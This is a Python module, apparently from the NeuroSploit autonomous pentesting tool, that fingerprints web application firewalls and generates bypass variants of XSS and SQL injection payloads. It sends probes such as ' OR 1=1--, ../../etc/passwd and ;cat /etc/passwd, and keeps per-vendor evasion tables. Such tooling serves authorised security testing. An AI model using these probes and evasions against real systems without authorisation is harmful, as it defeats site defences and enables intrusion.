# Mirror of https://github.com/CyberSecurityUP/NeuroSploit.git
# Synced 2026-02-12 14:02:45 +00:00
"""
NeuroSploit v3 - WAF Detector

WAF fingerprinting, bypass strategy database, and payload adaptation
for autonomous pentesting. Detects 15+ WAF vendors and provides
per-WAF bypass techniques.
"""
import logging
|
|
import re
|
|
from dataclasses import dataclass, field
|
|
from typing import Dict, List, Optional, Any
|
|
|
|
logger = logging.getLogger(__name__)
|
|
|
|
|
|
@dataclass
|
|
class WAFMatch:
|
|
"""A detected WAF."""
|
|
name: str # "cloudflare", "aws_waf", etc.
|
|
confidence: float # 0.0-1.0
|
|
detection_method: str # "header", "body", "server", "probe"
|
|
evidence: str
|
|
|
|
|
|
@dataclass
|
|
class WAFResult:
|
|
"""Complete WAF detection result."""
|
|
detected_wafs: List[WAFMatch] = field(default_factory=list)
|
|
blocking_patterns: Dict[str, bool] = field(default_factory=dict)
|
|
recommended_delay: float = 0.1
|
|
|
|
|
|
# 15+ WAF signatures
|
|
WAF_SIGNATURES = {
|
|
"cloudflare": {
|
|
"headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
|
|
"body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
|
|
"server": ["cloudflare"],
|
|
},
|
|
"aws_waf": {
|
|
"headers": ["x-amzn-requestid", "x-amzn-errortype"],
|
|
"body": ["request blocked", "aws waf"],
|
|
"server": ["cloudfront", "amazons3"],
|
|
},
|
|
"akamai": {
|
|
"headers": ["x-akamai-session-info", "akamai-origin-hop"],
|
|
"body": ["akamai", "ghost"],
|
|
"server": ["akamaighost"],
|
|
},
|
|
"imperva": {
|
|
"headers": ["x-iinfo", "x-cdn"],
|
|
"body": ["imperva", "incapsula incident", "incapsula"],
|
|
"server": ["imperva"],
|
|
},
|
|
"modsecurity": {
|
|
"headers": ["x-denied-reason", "x-modsecurity"],
|
|
"body": ["mod_security", "modsecurity", "noyb"],
|
|
"server": [],
|
|
},
|
|
"f5_bigip": {
|
|
"headers": ["x-waf-status", "x-cnection"],
|
|
"body": ["the requested url was rejected"],
|
|
"server": ["big-ip", "bigip", "f5"],
|
|
},
|
|
"sucuri": {
|
|
"headers": ["x-sucuri-id", "x-sucuri-cache"],
|
|
"body": ["sucuri", "sucuri website firewall", "cloudproxy"],
|
|
"server": ["sucuri"],
|
|
},
|
|
"barracuda": {
|
|
"headers": ["barra_counter_session"],
|
|
"body": ["barracuda", "barracuda networks"],
|
|
"server": [],
|
|
},
|
|
"fortinet": {
|
|
"headers": ["x-fw-server"],
|
|
"body": ["fortigate", "fortiweb", "fortinet"],
|
|
"server": ["fortiweb"],
|
|
},
|
|
"citrix": {
|
|
"headers": ["citrix-transactionid", "cneonction", "nncoection"],
|
|
"body": ["citrix", "netscaler appfw"],
|
|
"server": ["netscaler"],
|
|
},
|
|
"azure_waf": {
|
|
"headers": ["x-azure-ref", "x-ms-forbidden-ip"],
|
|
"body": ["azure application gateway", "azure front door"],
|
|
"server": ["microsoft-azure-application-gateway"],
|
|
},
|
|
"gcp_armor": {
|
|
"headers": ["x-cloud-trace-context"],
|
|
"body": ["google cloud armor", "forbidden by security policy"],
|
|
"server": ["google frontend", "gfe"],
|
|
},
|
|
"wordfence": {
|
|
"headers": [],
|
|
"body": ["wordfence", "generated by wordfence", "this response was generated by wordfence"],
|
|
"server": [],
|
|
},
|
|
"cloudfront": {
|
|
"headers": ["x-amz-cf-id", "x-amz-cf-pop"],
|
|
"body": ["cloudfront", "error from cloudfront"],
|
|
"server": ["cloudfront"],
|
|
},
|
|
"fastly": {
|
|
"headers": ["x-fastly-request-id", "fastly-restarts"],
|
|
"body": ["fastly error"],
|
|
"server": ["fastly"],
|
|
},
|
|
"reblaze": {
|
|
"headers": ["rbzid"],
|
|
"body": ["reblaze", "access denied (rbz)"],
|
|
"server": ["reblaze"],
|
|
},
|
|
}
|
|
|
|
# Bypass strategies per WAF
|
|
BYPASS_STRATEGIES = {
|
|
"cloudflare": {
|
|
"xss": [
|
|
"unicode_escape", # \u003cscript\u003e
|
|
"svg_payload", # <svg onload=...>
|
|
"comment_injection", # <scr<!---->ipt>
|
|
"case_mixing", # <ScRiPt>
|
|
"html_entity", # <script>
|
|
],
|
|
"sqli": [
|
|
"inline_comment", # /*!50000UNION*/
|
|
"case_mixing", # uNiOn SeLeCt
|
|
"whitespace_variant", # UNION%0bSELECT
|
|
"scientific_notation", # 1e0UNION
|
|
],
|
|
"general": {
|
|
"delay": 0.3,
|
|
"headers": {"X-Forwarded-For": "127.0.0.1"},
|
|
},
|
|
},
|
|
"modsecurity": {
|
|
"xss": [
|
|
"inline_comment",
|
|
"case_mixing",
|
|
"whitespace_variant",
|
|
"null_byte",
|
|
],
|
|
"sqli": [
|
|
"inline_comment", # /*!50000OR*/
|
|
"case_mixing",
|
|
"double_encoding", # %2527
|
|
"whitespace_variant", # tab, newline, %0a
|
|
],
|
|
"general": {
|
|
"delay": 0.2,
|
|
},
|
|
},
|
|
"aws_waf": {
|
|
"xss": [
|
|
"double_encoding",
|
|
"null_byte",
|
|
"unicode_escape",
|
|
"svg_payload",
|
|
],
|
|
"sqli": [
|
|
"double_encoding", # %253C = <
|
|
"null_byte", # \x00
|
|
"scientific_notation", # 1e0=1
|
|
"concat_function", # CONCAT(0x27,...)
|
|
],
|
|
"general": {
|
|
"delay": 0.2,
|
|
},
|
|
},
|
|
"imperva": {
|
|
"xss": [
|
|
"unicode_escape",
|
|
"html_entity",
|
|
"svg_payload",
|
|
"comment_injection",
|
|
],
|
|
"sqli": [
|
|
"inline_comment",
|
|
"hex_encoding",
|
|
"whitespace_variant",
|
|
],
|
|
"general": {
|
|
"delay": 0.5,
|
|
},
|
|
},
|
|
"generic": {
|
|
"xss": [
|
|
"case_mixing",
|
|
"unicode_escape",
|
|
"svg_payload",
|
|
"html_entity",
|
|
],
|
|
"sqli": [
|
|
"inline_comment",
|
|
"case_mixing",
|
|
"whitespace_variant",
|
|
],
|
|
"general": {
|
|
"delay": 0.3,
|
|
"headers": {"X-Forwarded-For": "127.0.0.1"},
|
|
},
|
|
},
|
|
}
|
|
|
|
|
|
class WAFDetector:
|
|
"""WAF fingerprinting and bypass strategy engine.
|
|
|
|
Usage:
|
|
detector = WAFDetector(request_engine)
|
|
result = await detector.detect(url)
|
|
if result.detected_wafs:
|
|
adapted = detector.adapt_payload(payload, waf_name, vuln_type)
|
|
"""
|
|
|
|
# Probe payloads that trigger WAF responses
|
|
PROBE_PAYLOADS = {
|
|
"xss": "<script>alert(1)</script>",
|
|
"sqli": "' OR 1=1--",
|
|
"lfi": "../../etc/passwd",
|
|
"rce": ";cat /etc/passwd",
|
|
}
|
|
|
|
def __init__(self, request_engine=None):
|
|
self.request_engine = request_engine
|
|
self._cache: Dict[str, WAFResult] = {} # url -> result
|
|
|
|
async def detect(self, url: str) -> WAFResult:
|
|
"""Detect WAFs on the target URL.
|
|
|
|
Phase 1: Passive detection (headers/body from normal response)
|
|
Phase 2: Active probing (send trigger payloads, analyze blocks)
|
|
"""
|
|
from urllib.parse import urlparse
|
|
host = urlparse(url).netloc
|
|
if host in self._cache:
|
|
return self._cache[host]
|
|
|
|
detected: List[WAFMatch] = []
|
|
blocking: Dict[str, bool] = {}
|
|
|
|
# Phase 1: Passive detection from baseline request
|
|
if self.request_engine:
|
|
try:
|
|
result = await self.request_engine.request(url, method="GET")
|
|
if result:
|
|
passive_wafs = self._check_signatures(
|
|
result.headers, result.body, result.status
|
|
)
|
|
detected.extend(passive_wafs)
|
|
except Exception as e:
|
|
logger.debug(f"WAF passive detection error: {e}")
|
|
|
|
# Phase 2: Active probing (only if request engine available)
|
|
if self.request_engine:
|
|
for probe_type, payload in self.PROBE_PAYLOADS.items():
|
|
try:
|
|
probe_url = f"{url}?test={payload}"
|
|
result = await self.request_engine.request(
|
|
probe_url, method="GET"
|
|
)
|
|
if result:
|
|
if result.status in (403, 406, 429, 501):
|
|
blocking[probe_type] = True
|
|
probe_wafs = self._check_signatures(
|
|
result.headers, result.body, result.status
|
|
)
|
|
for w in probe_wafs:
|
|
if not any(d.name == w.name for d in detected):
|
|
w.detection_method = "probe"
|
|
detected.append(w)
|
|
else:
|
|
blocking[probe_type] = False
|
|
except Exception:
|
|
pass
|
|
|
|
# Determine recommended delay
|
|
delay = 0.1
|
|
if detected:
|
|
primary_waf = detected[0].name
|
|
strategy = BYPASS_STRATEGIES.get(primary_waf, BYPASS_STRATEGIES["generic"])
|
|
delay = strategy.get("general", {}).get("delay", 0.3)
|
|
|
|
waf_result = WAFResult(
|
|
detected_wafs=detected,
|
|
blocking_patterns=blocking,
|
|
recommended_delay=delay,
|
|
)
|
|
self._cache[host] = waf_result
|
|
|
|
if detected:
|
|
waf_names = ", ".join(f"{w.name}({w.confidence:.0%})" for w in detected)
|
|
logger.info(f"WAF detected on {host}: {waf_names}")
|
|
|
|
return waf_result
|
|
|
|
def _check_signatures(
|
|
self,
|
|
headers: Dict[str, str],
|
|
body: str,
|
|
status: int,
|
|
) -> List[WAFMatch]:
|
|
"""Check response against WAF signature database."""
|
|
matches = []
|
|
headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
|
|
body_lower = (body or "").lower()[:5000]
|
|
server = headers_lower.get("server", "")
|
|
|
|
for waf_name, sigs in WAF_SIGNATURES.items():
|
|
evidence_parts = []
|
|
confidence = 0.0
|
|
|
|
# Check headers
|
|
for h in sigs.get("headers", []):
|
|
if h.lower() in headers_lower:
|
|
evidence_parts.append(f"header:{h}")
|
|
confidence += 0.4
|
|
|
|
# Check body
|
|
for b in sigs.get("body", []):
|
|
if b.lower() in body_lower:
|
|
evidence_parts.append(f"body:{b}")
|
|
confidence += 0.3
|
|
|
|
# Check server header
|
|
for s in sigs.get("server", []):
|
|
if s.lower() in server:
|
|
evidence_parts.append(f"server:{s}")
|
|
confidence += 0.5
|
|
|
|
if evidence_parts:
|
|
confidence = min(1.0, confidence)
|
|
matches.append(WAFMatch(
|
|
name=waf_name,
|
|
confidence=confidence,
|
|
detection_method="header" if any("header:" in e for e in evidence_parts) else "body",
|
|
evidence=", ".join(evidence_parts),
|
|
))
|
|
|
|
# Sort by confidence
|
|
matches.sort(key=lambda m: m.confidence, reverse=True)
|
|
return matches
|
|
|
|
def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
|
|
"""Get bypass strategy for a specific WAF + vuln type combination."""
|
|
strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
|
|
|
|
# Normalize vuln type to category
|
|
category = self._vuln_to_category(vuln_type)
|
|
techniques = strategies.get(category, strategies.get("xss", []))
|
|
general = strategies.get("general", {})
|
|
|
|
return {
|
|
"techniques": techniques,
|
|
"delay": general.get("delay", 0.3),
|
|
"extra_headers": general.get("headers", {}),
|
|
}
|
|
|
|
def adapt_payload(
|
|
self, payload: str, waf_name: str, vuln_type: str
|
|
) -> List[str]:
|
|
"""Generate bypass variants of a payload for a specific WAF.
|
|
|
|
Returns list of adapted payloads, with original as fallback.
|
|
"""
|
|
strategy = self.get_bypass_strategy(waf_name, vuln_type)
|
|
adapted = []
|
|
|
|
for technique in strategy.get("techniques", []):
|
|
variant = self._apply_technique(payload, technique, vuln_type)
|
|
if variant and variant != payload:
|
|
adapted.append(variant)
|
|
|
|
# Deduplicate while preserving order
|
|
seen = set()
|
|
unique = []
|
|
for p in adapted:
|
|
if p not in seen:
|
|
seen.add(p)
|
|
unique.append(p)
|
|
|
|
return unique[:8] # Max 8 variants
|
|
|
|
def _vuln_to_category(self, vuln_type: str) -> str:
|
|
"""Map specific vuln type to WAF bypass category."""
|
|
sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
|
|
"sqli", "nosql_injection"}
|
|
xss_types = {"xss_reflected", "xss_stored", "xss_dom", "xss"}
|
|
|
|
if vuln_type in sqli_types:
|
|
return "sqli"
|
|
if vuln_type in xss_types:
|
|
return "xss"
|
|
return "xss" # Default category
|
|
|
|
def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
|
|
"""Apply a specific bypass technique to a payload."""
|
|
try:
|
|
if technique == "unicode_escape":
|
|
return self._unicode_escape(payload)
|
|
elif technique == "case_mixing":
|
|
return self._case_mix(payload)
|
|
elif technique == "double_encoding":
|
|
return self._double_encode(payload)
|
|
elif technique == "null_byte":
|
|
return self._null_byte(payload)
|
|
elif technique == "comment_injection":
|
|
return self._comment_inject(payload)
|
|
elif technique == "inline_comment":
|
|
return self._inline_comment(payload)
|
|
elif technique == "whitespace_variant":
|
|
return self._whitespace_variant(payload)
|
|
elif technique == "svg_payload":
|
|
return self._svg_variant(payload)
|
|
elif technique == "html_entity":
|
|
return self._html_entity(payload)
|
|
elif technique == "scientific_notation":
|
|
return self._scientific_notation(payload)
|
|
elif technique == "hex_encoding":
|
|
return self._hex_encode(payload)
|
|
elif technique == "concat_function":
|
|
return self._concat_function(payload)
|
|
except Exception:
|
|
pass
|
|
return None
|
|
|
|
# --- Bypass technique implementations ---
|
|
|
|
def _unicode_escape(self, payload: str) -> str:
|
|
"""Replace key characters with unicode escapes."""
|
|
replacements = {
|
|
"<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
|
|
'"': "\\u0022", "/": "\\u002f",
|
|
}
|
|
result = payload
|
|
for old, new in replacements.items():
|
|
result = result.replace(old, new)
|
|
return result
|
|
|
|
def _case_mix(self, payload: str) -> str:
|
|
"""Alternate case: <ScRiPt>, uNiOn SeLeCt."""
|
|
result = []
|
|
upper = True
|
|
for c in payload:
|
|
if c.isalpha():
|
|
result.append(c.upper() if upper else c.lower())
|
|
upper = not upper
|
|
else:
|
|
result.append(c)
|
|
return "".join(result)
|
|
|
|
def _double_encode(self, payload: str) -> str:
|
|
"""Double URL-encode special characters."""
|
|
import urllib.parse
|
|
# First encode
|
|
encoded = urllib.parse.quote(payload, safe="")
|
|
# Encode the % signs
|
|
return encoded.replace("%", "%25")
|
|
|
|
def _null_byte(self, payload: str) -> str:
|
|
"""Insert null bytes before key characters."""
|
|
return payload.replace("<", "%00<").replace("'", "%00'").replace('"', '%00"')
|
|
|
|
def _comment_inject(self, payload: str) -> str:
|
|
"""Inject HTML comments into tags."""
|
|
# <script> -> <scr<!---->ipt>
|
|
payload = payload.replace("<script>", "<scr<!---->ipt>")
|
|
payload = payload.replace("</script>", "</scr<!---->ipt>")
|
|
return payload
|
|
|
|
def _inline_comment(self, payload: str) -> str:
|
|
"""SQL inline comment bypass: UNION -> /*!50000UNION*/"""
|
|
keywords = ["UNION", "SELECT", "OR", "AND", "FROM", "WHERE"]
|
|
result = payload
|
|
for kw in keywords:
|
|
result = re.sub(
|
|
rf'\b{kw}\b',
|
|
f'/*!50000{kw}*/',
|
|
result,
|
|
flags=re.IGNORECASE
|
|
)
|
|
return result
|
|
|
|
def _whitespace_variant(self, payload: str) -> str:
|
|
"""Replace spaces with alternative whitespace."""
|
|
alternatives = ["%09", "%0a", "%0b", "%0c", "%0d", "%a0"]
|
|
result = payload
|
|
for alt in alternatives[:2]:
|
|
result = result.replace(" ", alt, 1)
|
|
return result
|
|
|
|
def _svg_variant(self, payload: str) -> str:
|
|
"""Convert XSS to SVG-based payload."""
|
|
# Extract the JS code if possible
|
|
match = re.search(r'(?:alert|confirm|prompt)\([^)]*\)', payload)
|
|
if match:
|
|
js_code = match.group(0)
|
|
return f'<svg onload="{js_code}">'
|
|
return '<svg/onload=alert(1)>'
|
|
|
|
def _html_entity(self, payload: str) -> str:
|
|
"""Encode with HTML entities."""
|
|
replacements = {
|
|
"<": "<", ">": ">", "'": "'",
|
|
'"': """, "/": "/",
|
|
}
|
|
result = payload
|
|
for old, new in replacements.items():
|
|
result = result.replace(old, new)
|
|
return result
|
|
|
|
def _scientific_notation(self, payload: str) -> str:
|
|
"""Use scientific notation for SQL: 1 OR -> 1e0OR"""
|
|
return re.sub(r'(\d+)\s+(OR|AND|UNION)', r'\1e0\2', payload, flags=re.IGNORECASE)
|
|
|
|
def _hex_encode(self, payload: str) -> str:
|
|
"""Hex-encode string literals in SQL."""
|
|
def to_hex(match):
|
|
s = match.group(1)
|
|
hex_str = "0x" + s.encode().hex()
|
|
return hex_str
|
|
return re.sub(r"'([^']+)'", to_hex, payload)
|
|
|
|
def _concat_function(self, payload: str) -> str:
|
|
"""Use CONCAT() to build strings."""
|
|
def concat_str(match):
|
|
s = match.group(1)
|
|
chars = ",".join(f"CHAR({ord(c)})" for c in s)
|
|
return f"CONCAT({chars})"
|
|
return re.sub(r"'([^']+)'", concat_str, payload)
|